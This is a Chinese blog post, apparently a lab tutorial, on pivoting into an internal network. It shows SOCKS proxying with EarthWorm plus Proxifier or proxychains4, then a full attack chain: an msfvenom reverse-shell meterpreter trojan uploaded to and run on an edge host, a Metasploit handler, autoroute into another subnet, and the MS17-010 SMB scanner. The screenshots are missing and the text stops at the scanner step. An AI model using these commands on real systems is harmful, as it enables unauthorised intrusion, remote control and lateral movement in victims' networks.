内网渗透-做代理流量转发-msf跨网段攻击(添加路由表)-Windows中ew和proxifier做代理-kali中ew和proxychains4做代理

0x01代理-windows中ew和proxifier

1.在靶机上上传ew 然后输入下面命令运行,正向代理

ew_for_windows.exe -s ssocksd -l 8000

2.在windows启用proxifier,添加服务器,输入靶机上的ip和端口

3.设置代理规则

第一步截图:

请添加图片描述

第二步截图:

请添加图片描述

第三步截图:

请添加图片描述

你可以使用代理了

0x02代理-kali中ew和proxychains4做代理

1.在靶机上上传ew 然后输入下面命令运行,正向代理

ew_for_windows.exe -s ssocksd -l 8000

2.在kali攻击机上进行如下配置

vi /etc/proxychains4.conf  #修改如图下面即可

修改后的截图:进行三个地方修改即可

请添加图片描述

请添加图片描述

代理成功截图:要使用代理输入proxychains+运行的服务(msfconsole)

请添加图片描述

0x03代理-msf跨网段攻击(添加路由表)

利用msf生成马儿让目标运行,反弹回来meterpreter查看路由添加路由,然后msf就可以访问内网,可以使用msf来探测以及渗透测试。

(1)生成木马

msfvenom -p windows/meterpreter/reverse_tcp LHOST=你的IP LPORT=6666 -f exe > /var/www/html/6666.exe

请添加图片描述

把生成的666.exe上传到边缘靶机中即192.168.0.106机器中,然后点击运行

(2)kali监听端口

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.102
set lport 4444
run

请添加图片描述

添加路由

第一步:run get_local_subnets (获取当前路由)
第二步: run autoroute -s 192.168.52.0/24 (添加路由)
第三步: run autoroute -p (查看已添加路由)

请添加图片描述

攻击pyload

第一步:background(转换到后台)

请添加图片描述

第二步:use auxiliary/scanner/smb/smb_ms17_010

请添加图片描述

  • 1
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

h1dm

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值